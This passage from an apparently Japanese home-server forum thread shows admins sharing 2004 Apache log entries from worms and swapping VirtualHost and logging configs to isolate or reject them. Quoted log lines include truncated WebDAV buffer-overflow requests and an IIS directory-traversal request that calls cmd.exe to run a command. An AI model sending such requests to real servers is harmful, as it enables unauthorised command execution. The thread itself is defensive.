61.232.181.151 - - [10/Mar/2004:21:36:15 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.92.205.94 - - [11/Mar/2004:03:39:46 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.61.20.56 - - [12/Mar/2004:01:41:09 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"

262:DNS未登録さん
04/03/12 16:35 .net
219.133.182.176 - - [10/Mar/2004:13:48:10 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-"
219.145.4.26 - - [10/Mar/2004:20:28:03 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-"
219.133.125.221 - - [11/Mar/2004:00:34:39 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-"


263:DNS未登録さん
04/03/13 03:37 .net
FTPでいろんなアカウントとパスを組み合わせてくるやつが居るけど、
あれは単に割れ鯖をさがしてるクローラー?

264:DNS未登録さん
04/03/22 21:24 .net
usen-221x114x94x213.ap-us01.usen.ad.jp - - [22/Mar/2004:16:29:42 +0900] "SEARCH
/\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x0
2\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x0
2\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1(ry
('-`).。oO(鬱陶しいことこの上ないのだが

265:DNS未登録さん
04/03/31 12:01 .net
220.145.233.60 - - [31/Mar/2004:10:29:15 +0900] "SEARCH /\x90\x02\ (ry
大量にキテル…しかも1リクエストに32Kbyteもある…
鯖ではないだろうけど、ウイルス対策くらいしっかりしてほしいなぁ

266:DNS未登録さん
04/04/01 02:36 .net
ログを切り分けたいのですが上手くいかね。
SetEnvIf Request_URI "^/\\x90\\x02" worm nolog
SetEnvIf Request_URI "^/\x90\x02" worm nolog

アドバイスよろ。

267:DNS未登録さん
04/04/01 04:08 .net
>>266
スレリンク(unix板:812-814番)
情報が分散するのは良くないよな

268:DNS未登録さん
04/04/02 02:51 .net
>>267
ありがと,そっちのスレはチェックしてませんでした。
SetEnvIf じゃ分けれませんか(´・ω・`)ショボーン

269:267
04/04/02 04:18 .net
>>268
なんとな~くだけど、vhost使って分けられそうな気がしない?
大抵のウィルスはhostを名乗らないので、別けられそうな気がする
とか思いつつ、俺は放置してるわけだが

270:267
04/04/02 05:36 .net
いい機会なんで試してみたが、分離は可能でした
結果だけ報告

271:DNS未登録さん
04/04/02 19:16 .net
>>266
パイプ経由のロギングを利用するのはどうよ?
CustomLog "|/root/sh/logfilter >> /var/log/httpd/access_log" combined env=!nolog
とでもして、/root/sh/logfilterスクリプト内で"SEARCH /\x90\x02\…"は弾くようにするとか。

272:DNS未登録さん
04/04/02 21:53 .net
267のリンク先の814だが。
Mac 板の UNIX スレだか鯖スレだかにも書いたような気がするが、
<VirtualHost> で分離するのは当然有効。
ワーム以外にも踏台探しのアフォによるアクセスも隔離できることが多いのでオススメ。
あるいは、「異常なログを隔離する」ではなく、
CustomLog /dev/null common
CustomLog /path/to/access_log combined env=REMOTE_ADDR
のように、環境変数が正常にセットされているもののみ隔離するという方法でも
できそうだが、これはうまくいくかどうかは試していない。


273:DNS未登録さん
04/04/03 03:17 .net
>>272
<VirtualHost>でhost名を知らないアクセス=ワームを分離する方法ですが、
これだとローカルからのIP直打ちアクセスも分離されてしまうんじゃないでしょうか。
わざわざ串を刺すのはちょっと…。

274:267
04/04/03 04:13 .net
>>273
うちのルータ(というより*BSD箱だけど)はグローバルIPでアクセスしても応答してくれるから問題は無いし
hosts に書くかDNS鯖に細工をすれば対処できませんか?
それに自分のアクセスがログに記録されないぐらいならデバック時以外は被害は少ないと思われ

275:DNS未登録さん
04/04/03 11:38 .net
272だが。
IP 直打ちでも Host: にその IP アドレスが入るので、
プライベートアドレスを ServerAlias に指定すればよし。
NameVirtualHost *
<VirtualHost *>
ServerName dummy.host
CustomLog [隔離ログ]
...
</VirtualHost>
<VirtualHost *>
ServerName xxx.yyy.zzz
ServerAlias localhost 127.0.0.1 192.168.0.1 ...
CustomLog [ほんとのログ]
...
</VirtualHost>
このように設定すれば、Host: がないか、あってもグローバルの IP アドレスの場合は
dummy.host の設定が使われる。

276:273
04/04/03 15:51 .net
>>274-275
大変参考になりました。
で、>>261他のログを分離できたとはいえ、そのままではログファイルを圧迫することに変わりないので
アクセスログの書式も
 \"%r\" → \"%m %!414U %H\"
として、414(HTTP_REQUEST_URI_TOO_LARGE)のときはURLを記録しないように、
ついでにクソ長いクエリ送ってくるワーム用にクエリ文字列を記録しないよう変更しました。

277:DNS未登録さん
04/04/04 02:33 .net
どうしよう。ログにクソクエリの跡が

278:DNS未登録さん
04/04/05 22:05 .net
ワーム用の<VirtualHost>設定でDocumentRootを/dev/nullにしちゃうのはマズいでしょうか?

279:DNS未登録さん
04/04/06 10:08 .net
SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90 で来るヤツって
www のホスト名で来てませんか?

280:DNS未登録さん
04/04/06 10:14 .net
>>278
/dev/zeroにしてください

281:278
04/04/06 14:51 .net
>>276
レスありがとうございます。あれから調べてみたところ、どうやら/dev/nullや/dev/zeroといった
特殊デバイスはApacheではアクセスできないようになっているみたいですね。
実験的にDocumentRootに設定してみましたが、エラーログには
[Tue Apr 6 12:34:56 2004] [error] [client xxx.xxx.xxx.xxx] object is not a file, directory or symlink: /dev/zero
と、/var/hogeのように存在しないディレクトリを設定した時と同じエラーが記録されていました。
まあワームにわざわざディレクトリを用意するのも馬鹿らしいので、/dev/zero指定にしようと思います。

282:DNS未登録さん
04/04/06 15:13 .net
いや、/dev/zeroはネタだろ…。

283:DNS未登録さん
04/04/06 15:26 .net
/dev/shm

284:DNS未登録さん
04/04/14 13:37 .net
保守

285:sage
04/04/21 15:04 2waT5kFU.net
誘導されてきました.
SEARCHとかのワーム攻撃を避けるために,
NGSecureWeb for Linux
URLリンク(canon-sol.jp)
とか
SRP(Secure Reverse Proxy)
URLリンク(www.gomibako.com)
とか使ってる人います?役に立ちますかね?

286:DNS未登録さん
04/04/21 16:44 .net
>>285
個人で鯖立ててる分には>>260以降の対策で十分なので要らないな。
まあわざわざ製品を使おうと考えてるところを見ると、業務用なんだろうけど。

287:DNS未登録さん
04/04/21 16:53 .net
>>286
ここは自宅鯖板
で、名前にsageを入れる意味は何なんだろう

288:DNS未登録さん
04/04/30 21:40 .net
自宅で鯖っつか社長の趣味で意味無く鯖立てたとか
最近のウィルスによるアクセスはその人達が原因かな

289:DNS未登録さん
04/05/04 23:15 .net
最近、ワーム多すぎ。ログがこればっかり。

290:DNS未登録さん
04/05/04 23:26 .net
ど、どれだ??(汗

291:DNS未登録さん
04/05/05 13:54 .net
ログなんか見てネーヨ

292:DNS未登録さん
04/05/05 14:01 .net
URLリンク(www.microsoft.com)
Sasser ワームについてのお知らせ
休み明けに注意

293:DNS未登録さん
04/05/09 05:51 .net
WOLでスタンバイにしているが、すぐに起動してしまうのは、ワームのせいなのかよ・・・。

294:DNS未登録さん
04/06/19 01:01 Jqdp5jls.net
緊急浮上

295:DNS未登録さん
04/06/20 01:36 .net
●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..●
無料のウイルス対策ソフトなどのセキュリティソフト一覧
URLリンク(www.geocities.co.jp)
●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...●

296:DNS未登録さん
04/06/21 23:58 .net
感染しているPCを持っているユーザーに通知してあげたい
HPがあってメルアド書いててくれたら一番、楽なんだけどね
Windowsのメッセージサービスだっけ? あれって日本語も通るんだっけ?
気づいてくれないかなぁ・・・
218.114.60.82 - - [21/Jun/2004:21:55:14 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1042 "-" "-"


297:DNS未登録さん
04/06/22 00:08 .net
>>296
messengerサービスは日本語通るよ。

298:DNS未登録さん
04/06/25 22:10 .net
ほらよ。
ワームの場合やポートスキャンなどのIPアドレスベースのアクセスは、クエリを
ログに保存しない。かつ、すべてのリクエストを拒否する。
おまけで、拒否した403エラーをerror_logにも残さない。
LogFormat "%h %l %u %t \"%m %U %H\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" attacked
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" combined
# Reject IP Adress Access
<VirtualHost XXX.XXX.XXX.XXX:80>
CustomLog logs/access_log attacked
ErrorLog /dev/null
<Directory ~ ".*">
Order deny,allow
Deny from all
</Directory>
</VirtualHost>
<VirtualHost XXX.XXX.XXX.XXX:80>
ServerName www.example.com
DocumentRoot /usr/local/apache/htdocs
ServerAdmin webmaster@www.example.com
CustomLog logs/example_access_log extended combined
ErrorLog logs/example_error_log
</VirtualHost>
<VirtualHost XXX.XXX.XXX.XXX:80>

</VirtualHost>
<VirtualHost XXX.XXX.XXX.XXX:80>

</VirtualHost>


299:DNS未登録さん
04/06/25 22:23 44W99bib.net
ふふーん

300:DNS未登録さん
04/07/09 04:36 csRQH/jq.net
age

301:DNS未登録さん
04/07/23 16:06 .net
218.88.235.240 - - [23/Jul/2004:03:00:50 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCC・・・
アクセスしてみたら中国のサイトみたいだけど・・・


302:DNS未登録さん
04/07/23 20:38 .net
>>301
それアタックツールじゃない?
WinNTAutoAttackっていうやつ


303:DNS未登録さん
04/07/23 22:23 .net
203.205.99.199 - - [22/Jul/2004:01:33:57 +0900] "\xc8C\xc0\x1d" 501 - "-" "-"
203.205.99.199 - - [22/Jul/2004:01:34:44 +0900] "HZ\xc0\x1d" 501 - "-" "-"
203.205.99.199 - - [22/Jul/2004:01:38:12 +0900] "0\x9f\xc0\x1d" 501 - "-" "-"
最近、こういうのが来るようになったんですけど....

304:DNS未登録さん
04/07/24 00:20 vV4StFaU.net
>>303
うちにも来てますね。同じようなの。
メソッドがなくて、リクエスト文字列はバラバラ。
なんらかのワームと思われますけど、
共通の指紋がなくて検索に掛からずいまだ正体不明です。


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch